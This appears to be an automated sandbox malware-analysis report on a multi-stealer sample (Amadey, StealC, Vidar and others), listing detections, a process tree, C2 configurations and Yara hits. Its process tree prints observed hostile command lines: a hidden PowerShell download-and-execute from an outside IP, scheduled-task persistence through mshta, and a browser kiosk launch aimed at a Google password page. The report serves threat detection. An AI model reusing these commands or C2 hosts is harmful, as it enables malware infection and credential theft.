Edit tour

Windows Analysis Report
0xqfQZufeQ.exe

Overview

General Information

Sample name:	0xqfQZufeQ.exe renamed because original name is a hash value
Original sample name:	e2c3da7ca095831448e4c75f8e5e2202.exe
Analysis ID:	1604552
MD5:	e2c3da7ca095831448e4c75f8e5e2202
SHA1:	6e3f3100f7250e504722cf136d9cbde13c759d54
SHA256:	62a119cb2ae13b18d74f2071346d4bedfe5a910264ac098ca34404f5f2daa0a5
Tags:	exeuser-abuse_ch
Infos:

Detection

Amadey, Credential Flusher, Cryptbot, GCleaner, LummaC Stealer, Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Attempt to bypass Chrome Application-Bound Encryption

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Powershell download and execute file

Suricata IDS alerts for network traffic

Yara detected Amadey

Yara detected Amadeys stealer DLL

Yara detected Credential Flusher

Yara detected Cryptbot

Yara detected GCleaner

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

Yara detected obfuscated html page

Binary is likely a compiled AutoIt script file

C2 URLs / IPs found in malware configuration

Creates HTA files

Creates multiple autostart registry keys

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Joe Sandbox ML detected suspicious sample

Leaks process information

Machine Learning detection for dropped file

Machine Learning detection for sample

Monitors registry run keys for changes

PE file contains section with special chars

Potentially malicious time measurement code found

Powershell drops PE file

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: PowerShell DownloadFile

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious MSHTA Child Process

Sigma detected: Suspicious Script Execution From Temp Folder

Suspicious powershell command line found

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to download and execute files (via powershell)

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Uses known network protocols on non-standard ports

Uses schtasks.exe or at.exe to add and modify task schedules

AV process strings found (often used to terminate AV products)

Binary contains a suspicious time stamp

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Connects to many different domains

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Searches for user specific document files

Sigma detected: Browser Started with Remote Debugging

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: PowerShell Download Pattern

Sigma detected: PowerShell Web Download

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: Usage Of Web Request Commands And Cmdlets

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Uses taskkill to terminate processes

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

0xqfQZufeQ.exe (PID: 7412 cmdline: "C:\Users\user\Desktop\0xqfQZufeQ.exe" MD5: E2C3DA7CA095831448E4C75F8E5E2202)

axplong.exe (PID: 7648 cmdline: "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" MD5: E2C3DA7CA095831448E4C75F8E5E2202)

axplong.exe (PID: 8152 cmdline: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe MD5: E2C3DA7CA095831448E4C75F8E5E2202)

0f39a8c7db.exe (PID: 3340 cmdline: "C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe" MD5: 1D1B67565EF8F1E7BD98824D5FAF1EC6)

chrome.exe (PID: 5760 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 3800 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1928 --field-trial-handle=2080,i,8469522446261978665,9122327943135786240,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

msedge.exe (PID: 6164 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="" MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 7876 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1908 --field-trial-handle=2016,i,4419702556326293557,15812454989437245169,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

8166ff9922.exe (PID: 5620 cmdline: "C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe" MD5: 93A9982516A4C1373DD5A2A6130ADE71)

skotes.exe (PID: 8008 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 93A9982516A4C1373DD5A2A6130ADE71)

eb74aeb58b.exe (PID: 2340 cmdline: "C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe" MD5: CC09DBF12FBE42E7CE057E16071F64CE)

1f1ada1ce1.exe (PID: 7256 cmdline: "C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe" MD5: 33CDE4D5E068E6795A8C79E34C97F898)

8f4d1353d2.exe (PID: 7728 cmdline: "C:\Users\user\AppData\Local\Temp\1062151001\8f4d1353d2.exe" MD5: 1D1B67565EF8F1E7BD98824D5FAF1EC6)

a103019032.exe (PID: 7480 cmdline: "C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe" MD5: FEB48A16AFB3EE816A4C848A131C282A)

taskkill.exe (PID: 7928 cmdline: taskkill /F /IM firefox.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 1092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 4568 cmdline: taskkill /F /IM chrome.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 5596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 4788 cmdline: taskkill /F /IM msedge.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 5020 cmdline: taskkill /F /IM opera.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 6424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 3920 cmdline: taskkill /F /IM brave.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 4992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

firefox.exe (PID: 2376 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

0c43e4c1fb.exe (PID: 4132 cmdline: "C:\Users\user\AppData\Local\Temp\1062153001\0c43e4c1fb.exe" MD5: 6C0B69A188A8453EB5532585AF2098B8)

cmd.exe (PID: 5708 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn qyqYHmavVr6 /tr "mshta C:\Users\user\AppData\Local\Temp\hEVLkVr9t.hta" /sc minute /mo 25 /ru "user" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7936 cmdline: schtasks /create /tn qyqYHmavVr6 /tr "mshta C:\Users\user\AppData\Local\Temp\hEVLkVr9t.hta" /sc minute /mo 25 /ru "user" /f MD5: 48C2FE20575769DE916F48EF0676A965)

mshta.exe (PID: 7848 cmdline: mshta C:\Users\user\AppData\Local\Temp\hEVLkVr9t.hta MD5: 06B02D5C097C7DB1F109749C45F3F505)

powershell.exe (PID: 3364 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'GZNYHYYDLQECVDTUHJNUMDPIB4RIHGE8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 4280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

3f28c42ac4.exe (PID: 6368 cmdline: "C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe" MD5: 6E4DF2CFFB5F28226172C6C317D73233)

382cd038a3.exe (PID: 5600 cmdline: "C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe" MD5: B5827F3668223D3111ED275D9C79ED06)

0f39a8c7db.exe (PID: 6304 cmdline: "C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe" MD5: 1D1B67565EF8F1E7BD98824D5FAF1EC6)

msedge.exe (PID: 6692 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 3172 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2356 --field-trial-handle=1968,i,3903610469523222720,1416506910416547773,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

8166ff9922.exe (PID: 1836 cmdline: "C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe" MD5: 93A9982516A4C1373DD5A2A6130ADE71)

0f39a8c7db.exe (PID: 7452 cmdline: "C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe" MD5: 1D1B67565EF8F1E7BD98824D5FAF1EC6)

8166ff9922.exe (PID: 1012 cmdline: "C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe" MD5: 93A9982516A4C1373DD5A2A6130ADE71)

mshta.exe (PID: 4320 cmdline: C:\Windows\system32\mshta.EXE C:\Users\user\AppData\Local\Temp\hEVLkVr9t.hta MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

powershell.exe (PID: 3820 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'GZNYHYYDLQECVDTUHJNUMDPIB4RIHGE8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d; MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

firefox.exe (PID: 6116 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 1860 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

1f1ada1ce1.exe (PID: 180 cmdline: "C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe" MD5: 33CDE4D5E068E6795A8C79E34C97F898)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
CryptBot	A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2.	No Attribution	https://any.run/cybersecurity-blog/cryptbot-infostealer-malware-analysis/ https://asec.ahnlab.com/en/24423/ https://asec.ahnlab.com/en/26052/ https://asec.ahnlab.com/en/31683/ https://asec.ahnlab.com/en/31802/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

Name	Description	Attribution	Blogpost URLs	Link
GCleaner		No Attribution	https://bazaar.abuse.ch/browse/signature/GCleaner/ https://github.com/VenzoV/MalwareAnalysisReports/blob/main/GCleaner/GCleaner%20Techincal%20Analysis%20with%20BinaryNinja.md https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145 https://n1ght-w0lf.github.io/malware%20analysis/gcleaner-loader/ https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/	https://malpedia.caad.fkie.fraunhofer.de/details/win.gcleaner

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.lexfo.fr/StealC_malware_analysis_part1.html https://blog.lexfo.fr/StealC_malware_analysis_part2.html https://blog.lexfo.fr/StealC_malware_analysis_part3.html https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.115/c4becf79229cb002.php"}

Threatname: LummaC

{"C2 url": "https://rampnatleadk.click/api", "Build Version": "fBkCmu--labinstall"}

Threatname: Amadey

{"C2 url": "185.215.113.16/Jo89Ku7d/index.php", "Version": "4.41", "Install Folder": "44111dbc49", "Install File": "axplong.exe"}

Threatname: Cryptbot

{"C2 list": ["home.fivegg5th.top", ".fivgg5th.top", "bhome.fivegg5th.top", ".1.1home.fivegg5th.top"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author
sslproxydump.pcap	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\hEVLkVr9t.hta	JoeSecurity_Obshtml	Yara detected obfuscated html page	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000018.00000003.2414896441.00000000010E8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000018.00000003.2409514945.00000000010E8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000017.00000003.2376701157.0000000000C17000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.2431848373.00000000000E1000.00000040.00000001.01000000.00000009.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000018.00000003.2413505501.00000000010E8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.2719027362.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000018.00000003.2413965960.00000000010E8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000018.00000003.2392742627.00000000010E8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000019.00000003.2330839784.00000000051F0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000018.00000003.2407859229.00000000010E8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000018.00000003.2420404696.00000000010E8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001C.00000003.2431765076.0000000004C20000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000018.00000003.2412742124.00000000010E8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000018.00000003.2420637446.00000000010E8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.2448228643.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1460637313.0000000000A61000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000018.00000003.2413043657.00000000010E8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000018.00000003.2415687258.00000000010E8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.2117668850.00000000003B1000.00000040.00000001.01000000.0000000A.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000002.00000003.1449265214.0000000005040000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000018.00000003.2404305353.00000000010E8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000003.2149443166.0000000004A70000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000018.00000003.2415390516.00000000010E8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000018.00000003.2411337757.00000000010E8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000018.00000003.2421264029.00000000010A4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000018.00000003.2413291901.00000000010E8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000018.00000003.2418504089.00000000010E8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000003.2028635188.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000018.00000003.2419399894.00000000010E8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000018.00000003.2417651719.00000000010E8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000002.2717348662.0000000000400000.00000040.00000001.01000000.0000000D.sdmp	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
00000018.00000003.2420843284.00000000010E8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000018.00000003.2415989218.00000000010E8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000018.00000003.2404646972.00000000010E8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000018.00000003.2405444703.00000000010E8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000018.00000003.2408623320.00000000010E8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.2448228643.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000018.00000003.2400915904.00000000010E8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000002.2735545518.0000000000D69000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x8c8:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000018.00000003.2444773768.00000000010A4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000002.2715844184.0000000000061000.00000040.00000001.01000000.0000000F.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000F.00000003.2158030696.00000000050D0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000019.00000002.2715340106.00000000000E1000.00000040.00000001.01000000.00000009.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000019.00000002.2723505102.00000000015CB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000008.00000002.2431848373.00000000001AC000.00000040.00000001.01000000.00000009.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000018.00000003.2406789937.00000000010E8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000018.00000003.2419064479.00000000010E8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000003.1961862834.0000000005320000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000016.00000002.2304832567.00000000003B1000.00000040.00000001.01000000.0000000A.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000018.00000003.2420045386.00000000010E8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000018.00000003.2406220397.00000000010E8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000018.00000003.2374517009.00000000010E9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000018.00000003.2401814629.00000000010E8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000018.00000003.2417052352.00000000010E8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000018.00000003.2416328008.00000000010E8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000003.2071117362.0000000005320000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000001C.00000002.2473503462.00000000003B1000.00000040.00000001.01000000.0000000A.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000D.00000002.2954337786.0000000004B40000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
0000000D.00000002.2954337786.0000000004B40000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
0000000F.00000002.2538106333.00000000013EB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000018.00000003.2407427652.00000000010E8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001A.00000003.2349197594.0000000004F30000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000018.00000003.2403345264.00000000010E8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000018.00000003.2376854459.00000000010E9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000018.00000003.2410714480.00000000010E8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000035.00000002.2722738319.0000000001541000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000016.00000003.2264263901.0000000005010000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000018.00000003.2412491896.00000000010E8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000035.00000002.2722738319.00000000014E6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
